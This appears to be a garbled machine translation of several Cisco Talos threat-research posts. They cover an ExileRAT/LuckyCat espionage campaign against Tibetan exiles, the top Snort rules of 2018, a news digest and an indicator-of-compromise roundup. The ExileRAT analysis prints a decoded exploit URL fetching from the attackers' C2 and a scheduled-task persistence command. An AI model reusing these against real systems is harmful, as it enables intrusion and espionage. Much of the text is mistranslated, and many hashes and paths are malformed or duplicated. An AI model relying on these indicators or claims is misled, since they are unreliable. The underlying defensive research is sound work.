EXILERAT shares LuckyCat and C2, targets Tibet

Cisco Talos has recently observed a malware campaign to distribute malicious Microsoft PowerPoint documents using a mailing list operated by the official organization of the Tibetan exile, Central Tibetan Administration (CTA). The document used in this attack is a PPSX file, a file format used to distribute an impossible slide show derived from Microsoft PowerPoint documents. In our case, from the CTA mailing list, an e-mail message containing an attached file called "Tibet-was-never-a-part-oF-china. ppsx" intended to attack the subscribers in this Tibet News Mailing List. I received it. Given the targets related to the nature of this malware, it is more likely that it was designed for spy activities rather than financial interests. This is only a part of the continuous trend of state actors who try to spy civilian for political reasons.

Malicious Office document

After launching this document, I found an additional campaign to share infrastructure and payload. The infrastructure used for command and control (C2) in this campaign was previously linked to Android and Window s-based Trojan, LuckyCat. With the discovery of C2, we were able to identify multiple campaigns hosted on C2 using the same payload or settings. The malicious PPSX file was used as a dropper for attackers to download payload by running various JavaScript scripts.

The PPSX document sent to the CTA mailing list was as follows:

All CTA mailing list received this email. The infrastructure of this mailing list is operated by Dearmail, which is based in India, and claims to be a "strong clou d-based e-mail campaign manager." The attacker changed the standard Reply-to header that is usually used in CTA email, and reply to the attacker's email address (at] gmail. com).

The email message itself mentions the 60th anniversary of the Dalai Lama exile on March 31. The document is a large slide show of more than 240 copies, claiming that the Central Tibetan Management Bureau created.

This PPSX is actually a copy of a legitimate PDF that can be downloaded from the Central Administration of Tibet's tibet. net homepage here. The slideshow filename "Tibet-was-never-a-part-of-China" is identical to the legitimate PDF published on November 1, 2018, indicating that the attackers moved quickly to exploit this.

The attack exploits CVE-2017-0199, an arbitrary code execution vulnerability in Microsoft Office. The attack comes from a script published on GitHub. The code is present in the "slide1. xml. rels" file. The best way to access these files is to unzip/unzip the PPSX file to see the full document contents. This file is located in the "/ppt/slides/_rels" folder.

This command decodes as "script:hXXp: \27. 126. 188[.]212:8005aqqee" and is now URL encoded.

The same script is found exploiting the app. xml file. However, note that the port number used is incorrect. The script never actually runs, and there is no request to TCP port 8003.

This script is seen when running dynamic analysis in Threat Grid.

PPSX also attempts to connect to iplocation to perform some geolocation lookups.

It performs an HTTP request to the C2 server, specifically requesting the resource "aqqee". Within the response body, a spoofed HTTP response date of "Sun 16 Apr 2017" appears.

The C2 then delivers a JavaScript script that downloads the payload "syshost. exe" from the C2.

This script is executed via WScript while creating a scheduled task called "Diagnostic_System_Host" using cmd. exe.

This scheduled task is created via cmd. exe with the following command line input: The name used is "Diagnostic_System_Host", which is very similar to the legitimate system task name "Diagnostic System Host" without the "_" (underscore).

"C:\WindowsSystem32cmd. exe" /c schtasks /create /sc minute /mo 1 /tn Diagnostic_System_Host /tr C:￭UsersAdministratorAppData￭Roaming￭syshost. exe

ExileRAT malware: Syshost. exe

The infected system is currently running ExileRAT aka syshost. exe provided by the attacker's C2. The compilation date matches the campaign timeframe: Jan 30 07:05:47 2019 UTC.

One of the first steps ExileRAT performs is to perform an IP location lookup and write that data to the c:˶data. ini file.

This can be easily identified in the PE: The C2 platform is also hardcoded in the PE:

EXILERAT is a simple RAT platform that allows you to acquire/ push/ push files, execute/ terminate processes, and execute files (computer name, user name, list drive, network adapter, process name).

C2 infrastructure

The C2 used in this campaign was "27. 126. 188. 212". We have confirmed some open directory, including other . exe and . dll files, "ACRORD32. EXE" and "CCL100U. DLL". These files were available in C2 "/1", but Tibet Campaign PPSX used "/2". It is common for threats to reuse infrastructure to make the campaign more prominent. We have confirmed the log file "Robins. log" contained in a directory that seems to be used to identify a new request for TCP 8005, which is likely to be this case.

During the analysis of C2, I was able to identify some domains using this IP, Mondaynews [.] TK, PeopleOffreeworld [.] TK, Gmailcom [.] TW. The attacker is likely to have registered this last domain to imitate Google, hoping to deceive users during the fishing campaign.

LuckyCat Android Rat

The IP of the C2 server with a har d-codeed Syshost. exe has recently been the hometown of a specific interesting domain: Mondaynews [.] TK. This domain is a C2 domain of Android Rat created on January 3rd. This is a new version of LuckyCat Android Rat used by Tibetan activists in 2012. In these attacks, malicious actors targeted the parent Tibetan sympa. This new version includes the same functions as the 2012 version (file upload, download, information theft, remote shell), which includes files, execution of apps, recording audio, and personal contacts. Several new features have been added, such as theft, SMS theft, recent calls, and theft of location information. You can see the 2012 command type class (left) and the 2019 command type class (right):

Some of these functions share the same name between the two versions, many are copied and paste:

Baidu's map API is also included in the app:

This malware checks if the app has the root authority of the Android device, and changes the permissions of a specific directory (/data/data/com. tencent. mm/) if you have root authority:

This directory has the encryption key of the chat application WeChat. Luckycat Android Rat's sp y-active nature and victim studies conclude that malware will change permissions so that the attacker can acquire these keys and decrypt chat messages. As you can see in the above code, this malware executes CHMOD 777 for the Tencent directory. This is performed to access this specific directory and get data such as files and keys from it. The attacker can then leak this information by using the Upload command in malware.

Conclusion

This attack is a new evolution of a series of attacks targeting political supporters, and is further evidence that all attacks do not require the use of zer o-day vulnerabilities. For example, the attack we called Persian Stalker in November stealed the message that users thought they were private, taking the vulnerability of the secure messaging app. Another attack that occurred in India last year was also targeting mobile devices, which used malicious mobile device management (MDM) software. This PPSX document used CVE-2017-0199 vulnerabilities to download additional payloads to victims. Obviously, the best practices of defense, which apply patches to a known vulnerabilities, will continue to be important and help protect the organization from this kind of attack. These specific attacks are likely to be for spy activities, not financial interests. We hope that this attack will quickly stop the attack, which will ensure that Cisco Talos' confusion to reorganize enemy.

Applicable range

The other methods for customers to detect and block this threat are shown below.

Advanced Malware Protection (AMP) is ideal to prevent the execution of malware used by such threats. The following is a screenshot showing how AMP protects customers from this threat.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) Web Scan prevents access to malicious websites and detects malware used in these attacks.

E-mail security can block malicious emails sent by threat actors as part of the campaign.

Network Security Appliance, such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevent System (NGIPS), and MERAKI MX, can detect malicious activities related to this threat.

AMP Threat Grid can identify malicious binaries and help all Cisco security products protect.

UMBRELLA, a secure Internet gateway (SIG), blocks users to malicious domains, IPs, and URLs, both inside and outside the company network.

Open source SNORTⓡ Subsklebarul set customers can always keep the latest status by downloading the latest rule packs available on Snort. org.

Invasion index (IOC)

The IOC related to this campaign is as follows:

Malicious Office document

PE32 EXILERAT

3eb026D8b778716231A07b3dbbdc99e2d3a635b1956DE8A1E6E6EFC659330E52DE (SHA256)

LuckyCat Android Rat

9498DDBFE296E98376187BE67B768F3BA053A7CBDFEEDA61E28C40BD21365F0-2019 (SHA256D0F4B7910AD0F4B7910AD294D294D294D294D294FF9 FDCA91C486EFCF 8-2012 (SHA256)

C2 server

27. 126. 188 [.] 212 MONDAYNEWS [.] TK PEOPLEOFFREWORLD [.] TK Gmailcom [.] TW

2018 Snort rule

February 6, 2019 8:19 am

This blog post was written by Cisco Talos's Benny Ketelslegers. The field of cyber security has changed considerably in 2018. The boom of cryptocurrencies shows a transition from ransomware to minor cryptocurrency. TALOS researchers have confirmed APT campaigns, mainly VPNFILTER, which affects small and mediu m-sized enterprises and home office network devices, and Olympic Destroyer, which seemed to have been designed to hinder the Winter Olympics.

However, such an attack that makes such a public is only a small part of the defense system provided every day. This post reviews some of the knowledge obtained by investigating the most frequently triggered Snort Irrigation rules reported by the Cisco Meraki system. These rules protect our customers from the most common attacks that could cause destructive damage, such as Olympic Destroyer. Snort is a free open source network invasion defense system. Cisco Talos offers new rules to Snort every week to protect software vulnerability and the latest malware.

Top 5 rules

Snort rules triggers a variety of network operations, such as projecting a network system, trying to exploit the system, detecting known malicious commands and control traffic. Each rule detects a specific network activity, and each rule has a unique identifier. This identifier consists of three parts. Generator ID (GID), rule ID (SID), revision number. GID identifies which part of the Snort has generated an event. For example, "1" indicates that an event was generated from the textol rulesubsistem. The SID uniquely identifies the rules itself. SID information can be searched by search tools on Snort website. The revision number is the rule version. Be sure to use the latest revision for the rules.

Snort rules are classified into various classes based on the type of activity detected, and are the most commonly reported classes are "Policy-Violation", followed by "Trojan-Activity" and "Attempted-Admin". Lo w-frequency classes, such as user trials and web application trials, are particularly interesting in detecting malicious inbound and outbound network traffic.

The device managed by Cisco MERAKI protects the client's network and gives an overview of a wider threat environment. The following are the most triggered rules in the policy in reverse order.

5th place: 1: 43687: 2 "Suspicious. But DNS queries"

The . bit top level domain extension is relatively unknown, but it is sometimes used for hosting the malware command & control (C2) system, and NECURS is one of the families used as part of the botnet communication. is. The . bit TLD is managed using namecoin. NameCoin is a distributed ledger without central authorities, one of the first folks of Bitcoin cryptocurrency. The no n-centralized properties of the . bit domain mean that there are few DNS servers that solve the domain, but the domain is also resistant to tak e-down.

4th place: 1: 41978: 5 "Microsoft Windows SMB Remote Code Examination"

In May 2017, a vulnerability of SMBV1, which allows a remote attacker to run any code via a crafted packet, was released. This led to the occurrence of the 2017 networkworm "Wannacry" and "NYETYA". Although it did not enter the top five rules in 2017, there seemed to be many scannings and attempts to abuse this vulnerabilities in 2018. This indicates the importance of applying network defense and patch management programs as often as possible.

Organizations should ensure that devices running Windows are fully patched. Additionally, SMB ports 139 and 445 should be blocked from all externally accessible hosts.

#3: 1:39867:4 "Suspicious . tk dns query"

The . tk top-level domain is owned by the Tokelau territory in the South Pacific. This domain registry allows users to register domains without payment, making the . tk top-level domain one of the most registered domain names. However, this free registration makes the . tk domain a popular target for malicious use.

This rule triggers a DNS lookup for the . tk domain. While such cases do not necessarily mean that the lookup is malicious in nature, they can be useful indicators of suspicious activity on your network. If you notice a sudden increase in triggers of this rule on your network, you should investigate the cause, especially if a single device is responsible for a large percentage of these triggers.

Other similar rules that detect DNS lookups to rarely used top-level domains such as . bit, . pw, and . top also made it into the list of the top 20 most triggered rules.

#2: 1:35030:1 & amp; 1:23493:6 "Win. Trojan. Zeus variant outbound connection"

This trojan has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click fraud, and many other criminal activities. It is the engine behind notorious botnets like Kneber, which made global headlines.

In early 2018, Talos observed a Zeus variant launched using the official website of Crystal Finance Millennium (CFM), a Ukraine-based accounting software developer.

This vector is similar to attacks Talos outlined in a blog post about Nyetya and related MeDoc. Ukrainian authorities and businesses had been alerted by a local security firm (ISSP) that another accounting software manufacturer had been compromised. The CFM website was used to distribute malware obtained by a malware downloader attached to messages related to a synchronized spam campaign.

Since the leak of Zeus source code in 2011, various variants have appeared, including Zeus Panda, which spreads by polluting Google search results.

1st place: 1:46237:1 "PUA-OTHER Cryptocurrency Miner outbound connection attempt" & amp; "1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt"

Over the past year, the explosion of malicious cryptomining has sent shock waves through the threat landscape. Cisco Talos has created various rules to combat cryptomining threats throughout the year, but this rule, deployed in early 2018, has proven to be number one in terms of the volume of attacks it detected and prevented. This threat has spread like wildfire across the Internet, being delivered through multiple vectors including email, web, and active exploits. It is not surprising that the combination of these two rules was the most frequently observed Snort rule in 2018.

Cryptomining consumes a lot of computing power and energy that is very valuable for organizations.

For an overview of all the relevant Snort rules and to learn more about all the methods and techniques Cisco Talos uses to stop cryptomining, download the Talos whitepaper here.

INBOUND vs. OUTBOUND

Network traffic may pass through an IDS from an external to internal (inbound) or internal to external (outbound) interface, or depending on the architecture of the environment, the traffic may avoid being filtered by a firewall or inspected by an IPS/IDS device. In such scenarios, alerts may be triggered and logged depending on the rule set and sensor configuration.

During 2018, outbound rules were triggered more frequently than internal, by a ratio of approximately 6. 9 to 1, more frequently than inbound. Inbound alerts are more likely to detect traffic resulting from attacks on various server-side applications, such as web applications and databases. Outbound alerts are more likely to include detection of outgoing traffic by malware-infected endpoints.

Looking more closely at these datasets, we see the following:

In 2018, Trojan activity was the most prevalent rule type, accounting for 42. 5% of all alerts, but now "Server-Apache" is in the lead, with "OS-Windows" a close second.

The "Server-Apache" class type covers Apache-related attacks, in this case mainly 1:41818 and 1:41819, which detect the Jakarta Multipart parser vulnerability in Apache Struts (CVE-2017-5638). Later in 2017, a second Apache Struts vulnerability (CVE-2017-9805) was discovered, making this rule type the most observed in IDS alerts in 2018.

The "OS-Windows" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability (MS-17-010) exploited by Wannacry and NotPetya.

The "Browser-plugins" class type covers attempts to exploit browser vulnerabilities dealing with browser plugins (e. g. ActiveX). Most activity in 2018 appears to consist of Sid 1:8068, specifically related to the "Microsoft Outlook Security Feature Bypass Vulnerability" (CVE-2017-11774).

For outbound connections, we observed a significant shift to the "PUA-Other" class, which is primarily cryptocurrency miner outbound connection attempts. Cryptomining can consume large amounts of valuable corporate resources, such as electricity and CPU power. For information on how Cisco Security products can help block cryptomining in your enterprise, see our whitepaper published in July 2018.

The most frequently triggered rule within the "Malware-CNC" rule class is the Zeus Trojan Activity rule mentioned above.

Conclusion

Snort rules detect potentially malicious network activity. Understanding why certain rules are triggered and how they protect your system is an important part of network security. Snort rules detect and block attempts to exploit vulnerable systems, indicating when a system is under attack, when a system has been compromised, and preventing users from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, which indicates that an attacker is attempting to identify weaknesses in an organization's security posture. They can be used to help organizations become more aware of activity occurring in their environment and indicate when they should be more suspicious of security alerts being generated.

As the threat environment changes, you need to ensure that you have the right rules in place to protect your systems. Typically, this means making sure that the latest rule sets are downloaded and installed promptly. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and being exploited may be short.

The most triggered rules in 2018: 1: 46237: 1 "Pua-Other Cryptocurrency Miner Outbound Connection Attempt" emphasizes the need to protect IoT devices from attacks. Mira i-like malware infringes these systems and tries to use it as part of the botnet for further malicious behavior. Network architecture needs to be protected on such a small network device in consideration of these attacks.

The security team needs to understand their network architecture and understand that the rules are triggered in their environment. In order to fully understand the meaning of triggered detection, it is important that the rules are open source. By knowing what network content has caused the rules trigger, you can learn about the network and always understand the threat environment as well as available protection.

Talos is proud of maintaining open source Snort rules, supporting the active community of researchers who contribute to Snort, and contributing to keeping the network safer from attacks. We are also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, and contribute to the release of open source tools and the details of the attack on blogs.

The latest TALOS rules detection function can be used at a low price of $ 29 a year with a personal account. Please see here for Snort business prices.

Cyber ​​Security Week Review (February 8)

February 8, 2019 7:51 am

Welcome to this week's Cyber ​​Security Week Inn Review! Here are some news that Cisco Talos should know in the security world. For other news delivered every week, please register with the Threat Source Newsletter here.

This week's top news

• The attacker continues to use the security hole of the Godaddy. com domain. This defect allows unrecognized users to send malicious emails via a regular pause domain. Most recently, the attacker group sent a series of sex and bomb intimidation emails, as explained in the Cisco Talos report. Godaddy is the world's largest domain name registry.
• The emailspammer is expanding its reach using the Gmail functions that are not well known. They can create a s o-called "dot mail" that puts a period between the characters in the domain name. If the attacker can use a legitimate domain, the email can be controlled by adding dots to the domain, and more spam can be sent.
• Facebook is strengthening the crackdown on fake accounts. The Social Media Site has deleted thousands of pages and profiles posting malicious content. These pages were transmitted by Iran and Indonesia. Earlier this month, a page based on the political motivation between Russia and the Philippines was deleted.

From Talos

• The evolution of the LuckyCat malware known as "EXILERAT" targets Tibet users. Talos has recently discovered an email campaign to send malicious documents to the members of the mailing list related to the Tibetan exile. The function of malware is considered to be intended to spy the victim.
• Talos, a minor of the cryptocurrency minor, Troy, has announced a roun d-up of the most triggered Snort® rule last year this week. The rules for protecting users from minor and Trojan horses were most commonly used.

Malware roun d-up

• A new backdoor targets the Linux system. This remote access troy, known as "Speakup", is able to gain the permanent of boot by changing the local cron utility, execute a shell command, and execute downloaded files. To
• A British bank customer was affected by the SS7 attack, and funds were leaked from an account. The attacker exploited SS7 to inaccume user phone calls and text messages, and eventually steal bank certification information. In the latest campaign, the UK Metro Bank was particularly targeted.
• Danabot's new variants target European users. The machine, which is already infected with Danabot, sent an "update" that impersonates a new subspecies, and the attacker sent Marspam to Polish users. These versions use a command and control communication method different from the original version of 2018.

Other news

• Mozilla is working on new Firefox features to protect from side channel attacks. The new tool aims to be an improved version of Google Chrome's Site Isolation function, which helps the browser to block potential side channel attacks.
• The U. S. Department of Justice and the Ministry of Land Security have completed the election safety report. The survey, which was ordered by the White House, finds out if the 2018 midterm election was affected by foreign interference. It is unknown whether the report will be released.
• Google has patched the serious vulnerabilities of the Android device as part of the security update in February. The attacker can completely take over the victim's mobile device using a specially crafted PNG image. According to Google, there is no evidence that the bug has been abused.

Threats from February 1 to February 8th

February 8, 2019 11:44 am

Today, Talos introduces the most common threats observed between February 1 and February 8. Like the conventional omnibus, this post is not intended for detailed analysis. Instead, this post summarizes the threats observed by the Company by emphasizing the characteristics of major actions, the indicators of infringement, and explaining the methods that our customers are automatically protected from these threats. Masu.

Note that the following threats described in this post are not comprehensive but as of the date of announcement. Also keep in mind that IOC search is only part of threat hunting. Finding a single IOC doesn't always mean you're malicious. The following detection and coverage of the following threats may be updated until the additional analysis of threats or vulnerability is performed. For the latest information, see Firepower Management Center, Snort. org, or Clamav. net. The following threats include only 25 of the related file hashes. The attached JSON file contains a complete list of file hash and all other IOCs in this post. As usual, keep in mind that all the IOCs contained in this document are indicators and one IOC is not malicious.

The most common threats featured in this omnibus are as follows:

• PUA. WIN. ADWARE. Softpulse-6848587-0 Adware SoftPulse is an advertisement that may install malicious software, utilize anti-virtual machines, and access potentially confidential information from local browsers. is.
• Doc. Downloader. Emotet-6846065-0 Downloader Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat capable of delivering a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros sent as malicious email attachments.
• PUA. Win. Adware. Razy-6847375-0 Adware Razy is a common detection name for a Windows Trojan. This set of samples contains encrypted code in the resource section that can be injected into legitimate processes.
• PUA. Win. Trojan. 00519ead-6847245-0 Trojan PUA. Win. Trojan. 00519ead is a set of malicious adware samples that leverage the AppInit DLL technique to achieve persistence and perform multiple DNS queries.
• PUA. Win. Adware. Sanctionedmedia-6818436-0 Adware This cluster contains . NET adware samples capable of code injection, opening ports to listen for incoming connections, disabling system restore, modifying files in system directories, contacting blacklisted domains, modifying the registry, and even copying to USB drives in some cases.
• Win. Ransomware. Gandcrab-6843341-0 Ransomware GandCrab is ransomware that encrypts documents, photos, databases, and other important files using the file extensions ". GDCB", ". CRAB", and ". KRAB". GandCrab is distributed through traditional spam campaigns and multiple exploit kits, including Rig and GrandSoft.

Threat

PUA. Win. Adware. Softpulse-6848587-0

Indicators of Compromise

• \System Control Set
  • Value Name PnpInstanceID
  • Value Name: PnpInstanceID
  • Value Name: ProxyBypass
  • N/A
  • N/A
  • Value Name: ProxyBypass
  • Intranet Name~6nu2bfmath[.]mrzp97cmg3[.]com
  • %LocalAppData%Temp
  • DF38A714DABA77BAE2. TMP
  • 1a74519d1568dece3bc64889f177df271b1bf93c0db86d97bb81e44a45403c2f
  • 1a93550fd9e061d7b572ca6269934ae5d0747e82855420895d41547680e372b7
  • 1e8a 9c8f07050897420bccfc612fe39dc11acec47dbb11a9b6d17876c0f1c748 22db5127ccb49f274ab3f46f6a845bcbe693e2ed4069220c9b33c4ba7cb6e7db 2da64c5 80965f9d0454b9004181ed7fdd5903e93cc41d06578cc968ac4215836 30ff57307b5d4456c64ee80e aacb717cdc1804c1f1c49409c7d583ec9f3de1e3 3ff2a4f01f7bfc31db3a54ecb98c0df737cd575cc11301af3b19ed99bc0e075b 473f7dd0173bafa5de751493de7c7e 2cc57fc290aac0ae4d2947cc57dcb8008d 5492869d71c62c3ade2750e79de155104329cc08fdd9 e65f9ba7d213868714c8 54d8cb379579ab2063b223f0011d8fa2838368b4b68f070a54b7e06ca62c1f03 5b5c9fd28470e81d23fcd6e5b2ea1bdf7c537ca6105 35d2f69a23fbd11f8d0cb 5e69b36b133ca551c46014c80afbb8fe2d9f6edd1e49cebcd22ca7bbec82d9ff
  • 6e43c79b858a27b93c87498faba5f60edd11d6472da142229bef6fb1d1310372
  • 78ca808e8428963d80d651655c6f79c8df44448a0d0613eb442a20a3081d0b21
  • 7db57b97495b59e84bca9e7f48b472e7412751b20780f17f453e4cf8c9694543
  • 7fbd028726e320fddbf67a00ac1a43e8d2f7fdc98dcb53c84fbbd77871c88afb
  • 881497c1db786286caae56f5055909c1bba6ccb24628773805f0f3a3a91c0993
  • 8a70ba0afe5efa6f633d97f51043d6be2ff3b3a2e6c5fba979f88a6bce4813e3
  • 92fbd91b969e6f94853430cb11a7ab2eaeaa05faefd2856a4aa55861f035beb0
  • 93b2e125a810723a7bc4e268dccbd784cd95e593077ae59fd9ac4daa9e1a8094
  • 99b1320bd421b716118e2aa11ff0044be4bb8849f96b099c6d7ff106ad80833b
  • 9ec1af22463376ceaf3468b88b000a155aa674ff27910c4a2d7188fb4ed5b315
  • a0ea6c233f4da2e161eb3108b9534d297cb15ec8d17eaf2d22132b0e67e99c4a
  • a1caca2e8b3b96935fcde41509753f4531ec3b9c5f436c7291c422fdf4c1d7ec
  • b2917e4031446976cdba6958df9d7c2d594f657232e0786b0e39039477b13534
  • Coverage
  • Screenshots of Detection
  • AMP
  • Doc. Downloader. Emotet-6846065-0
  • Indicators of Compromise
  • \DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
  • Value Name: ProxyEnable

  Applicable range

  Value Name: ProxyOverride

  Value Name: AutoConfigURL

  Value Name: AutoDetect

  Indicators of Compromise

  • Global\I98B68E3C
    • Global\552FFA80-3393-423d-8671-7BA046BB5906
    • PEMD4
    • PEM19C
    • PEM4F0
    • PEM240
    • 177[.]] 11[.]] 50[.]] 52
    • 195[.]201[.]46[.]139
    • 216[.]119[.]181[.]170
    • 71[.]78[.]24[.]146
    • 217[.]78[.]5[.]120
    • estacaogourmetrs[.]com[.]br
    • www[.]intelhost[.]com[.]br
    • restauranthub[.]co[.]uk
    • docksey[.]com
    • Microsoft Windows Temporary Internet Files
    • WRS. tmp
    • %SystemDrive%TEMP
    • $LE1922193. doc
    • %LocalAppData%Temp\CVR3B09. tmp
    • %LocalAppData%Temp
    • DF0EC263132EE87D9F. TMP
    • %LocalAppData%Temp~DF93E860FA48DCAA9A. TMP
    • %LocalAppData%Temp~DFCEAA78F57CC3DA47. TMP
    • %LocalAppData%Temp
    • Intranet Name~%AppData%Microsoft¥Office¥Recent¥FILE1922193. LNK
    • Intranet Name~%LocalAppData%Temp\zjkgwiwg. sq0. psm1
    • Intranet Name~%UserProfile%\Documents\20190204\PowerShell_transcript. PC. 0Py_SQrs. 20190204204359. txt
    • Intranet Name~%AppData%\Microsoft\Office\Recent\366814370. doc. LNK
    • Parary Internet Files
    • WRS. tmp
    • システムドライブ
    • $6814370. doc
    • 03591121dcf83a4aeb5e5fa12a1c1b75c93f5a215780eb1ebf209cc9518f12d3
    • 04c6555af6871c7818d3df3f0d5bbf9b85efac94e979c58234310b9a36079e78
    • 09be75647f21e12c0c4948ed45c68eb1db6667beece4e1d9748cddd5b4c38eaa
    • 15968dcbcb0514e7fd5bb68ced13112a3f1d8b31cd948b967f3becce9283508a~DF93E860FA48DCAA9A. TMP
    • 1A4C6A9C9E4BCCE9F83776F87F158D39CB21B78EA839AFAA01ABF3F93C49A4C~1a7211b1d27124D340B2D1346Ba93fc2a91fd00ed3899c95c1E16fc849c54A7
    • 1e83dfa18CC1CCF50DD5118f710BCC16E6C4E178977435c62B4238554BCF7F4
    • 2287689165547B27ed983152Dd781BC5377060a8Dd911b18671B6050932BF
    • 247Adbdf950ad6e592f0276ae72625818f8B41CE1BB7596AA89181E0CE99D4
    • 267af9Baaa1401ae4034200940Bad6c1f8cb622a7e731ed28fe84fe0682a6616
    • 3BC75DD152bea2D4670D22E2844731646c4a83024a3cd2349D465d5d5c16020ef
    • 607f94f56B7D2E2B01A0B8e0Bed7379144363D65e3040f44a197e8245B842C
    • 72da32c1bec496a54885f38802c429bc1aed434651bc6dc4acbac637c0c94ce
    • 76b02247cf6c9a6c436532a536cd2711fa876c15312dd6e0B3863e070E8595C
    • 7FB24419176DD9AA58B53a4246398D40c260c253B4772CB8FDC600324f24318
    • ad6b9cb00268157013c2B547a379a83660f5c7e01ce6893df16cf1db8fd3965
    • AF8E1169f130Baf122B25ae81D95D62CD3506Bae39673652D91AC4C4936049D
    • b5d83480ad61ce204743ef0904cbd2995991944efd3d0d2c9daaca9385f4b290
    • B9CBAD9B3CD4A1F08C3284D479FF40093454f76D237839001087CD0ADD5D468
    • fd46fb328e72be81cb97846b846051a95D2012630a3e3BFF5002c390883E
    • Coverarage
    • Screenshots of Detection
    • Pua. win. adware. razy-6847375-0
    • Indicators of Compromise
    • Local \ msctf. asm. mutexdefault1
    • LOCAL \ RSTRMGR-3887cab8-533f-4C85-B0DC-3E5639f5D511-Session0000
    • LOCAL \ RSTRMGR387CAB8-533f-4C85-B0DC-3E5639f5D511

    Applicable range

    Value Name: ProxyOverride

    %Localapdata%\ TIMP \ IS-51KNV. TMP \ 09131DDB2Cac0B4D4483B4BBC76A26F244Ab5A884350F733E1f60FC684DA039. TMP

    Indicators of Compromise

    • N/A
    • %Localapdata%Tempasis-9EHP6. TMP ￤セットアップ 64. TMP。
    • %Systemdrive%Docume
    • Admini
    • N/A
    • N/A
    • Locals
    • 1 \ TEMP \ IS-CA660C. TMP \ 367042276. TMP
    • %Systemdrive%Docume
    • 1ADMINI
    • 1LOCALS
    • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
    • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
    • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
    • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
    • Asian. exe~%Systemdrive%Docume~1admini~Locals
    • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
    • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
    • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
    • Asian. exe~%Systemdrive%Docume~1admini~09131ddb2cac0b44483B4BBC76A26F244Ab5a884350F733E1F60FC684DA039
    • Asian. exe~%Systemdrive%Docume~1admini~51c839a1fe25c31ba3903cc47f32880741dd1e708c9e97c81a2ea050802f84db
    • 68b15033f398389c45903085677e375dcaed3a3225d0854f6cbb5a2b45217cb7
    • 6985e3313e82b8cc6b450bb4cb6fcdebfc1b26ec83b0ace499c836d79b0b4fbe
    • 72a1cb206beae974f8d3504128e7892ba6fcbba38f31d7714f0fd811618bb439
    • 7384060612fcb8c40a324c136c571295f361a2e6d7f5b470206b574aed5fe0f4
    • 817ee49531f980991336c020e3d99f67796a38ff88aff948f07f658b083e6801
    • 88888888ec0980085d2a89f43fc32f543dfbe283d7ad0186e5c1089a08795d86b8
    • 9d6c6642a75a6328ef321212b482519ef74c767d9a02d1538debc53f031ee293
    • b0d1ef5415c13028a6fbe16900e255b599781bf3824144413f9364e619480194
    • bb87882c8e8c87e3f0f2accf837d141550fc0a048409b6c0a4aaec4b9829f1a0
    • fa64e7db69b070ef8bad8046cd7539dd1fca1bb63349f04c0e94584cf0a2a7d7
    • Coverage
    • Screenshots of Detection
    • PUA. Win. Trojan. 00519ead-6847245-0
    • Indicators of Compromise
    • \LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • Value Name: LanguageList
    • Value Name: AppInit_DLLs

    Applicable range

    Value Name: ProxyOverride

    Local\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511

    Indicators of Compromise

    • IsoScope_10c_IESQMMUTEX_0_519
      • IsoScope_10c_IESQMMUTEX_0_303
      • IsoScope_10c_IESQMMUTEX_0_331
      • 13[.]107[.]21[.]200
      • 104[.]200[.]23[.]95
      • Admini
      • 209[.]197[.]3[.]15
      • 188[.]72[.]202[.]44
      • 34[.]226[.]238[.]42
      • 158[.]69[.]244[.]165
      • 212[.]32[.]250[.]31
      • 144[.]202[.]40[.]125
      • 104[.]16[.]13[.]194
      • maxcdn[.]bootstrapcdn[.]com
      • 5isohu[.]com
      • done[.]witchcraftcash[.]com
      • thegoodcaster[.]com
      • www[.]theoffertop[.]com
      • myecomworld[.]net
      • wonderfulworldnow[.]クラブ
      • images[.]clickfunnels[.]com
      • tac25[.]com
      • track[.]rightsearchsmooth[.]club
      • Microsoft Internet Explorer\ Imagestore\aowwxkh
      • %LocalAppData%\Temp\A1D26E2
      • %LocalAppData%Temp\update. exe
      • %LocalAppData%Temp
      • DF32A074D75E28FF74. TMP
      • %ProgramFiles% (x86)㊟Internet Explorer㊟IEShims. dll. tmp
      • %ProgramFiles% (x86)㊟Internet Explorer㊟ieproxy. dll. tmp
      • %ProgramFiles% (x86)╱Java╱jre7╱bin╱ssv. dll. tmp
      • %LocalAppData%Temp
      • DF832EC54C42A76DA7. TMP
      • Intranet Name~%LocalAppData%Temp\is-0UA26. tmp\idp. dll. tmp
      • %LocalAppData%Temp\is-B01CK. tmp
      • %LocalAppData%\Temp\is-B01CK. tmp\c1f44c795198b23f8058492bb82a29addd2eeae623a53296f0195777d6a5fde5. tmp
      • %LocalAppData%\Temp\A1D26E2\116E56C6A8. tmp
      • Intranet Name~%LocalAppData%Temp\is-0UA26. tmp\idp. dll
      • %LocalAppData%Temp\is-0UA26. tmp\itdownload. dll
      • %LocalAppdata%Temp \ IS-0uA26. tmp \ psvince. dll
      • %LocalAppdata%Temp
      • DF12E5A698F292B5F8. tmp. tmp
      • %AppData%Microsoft \ Windows \ Cookies \ YO092G24. txt
      • 06386D249AE1B3CC4BC96BC96281AE89E89E10A85F68DD7E350E3E350E350E350E52FAB4C88A7C02375
      • 1E81d5888f17947BCBE31A74B3761C4FD6B49CB02D3EB4F85E065D8729E08
      • 298B8E26C83BA9FD1BB1FAEB5B0DF909F1D163E7896E26C48D35E041AE6320E
      • 641432c889189C393EDF97CDA9B08E5B08E5B083CBB8EECC5AC09B9D476F8872ECF3B
      • Intranet Name~A073171D4E57C4E308B6A62C0D14E597E95C030C019F428A26EE6C07C07F43557D
      • A5B2EA50F8DCEEC4752888C5E50E364B16253160DD7FB20932D8E5E56AC719
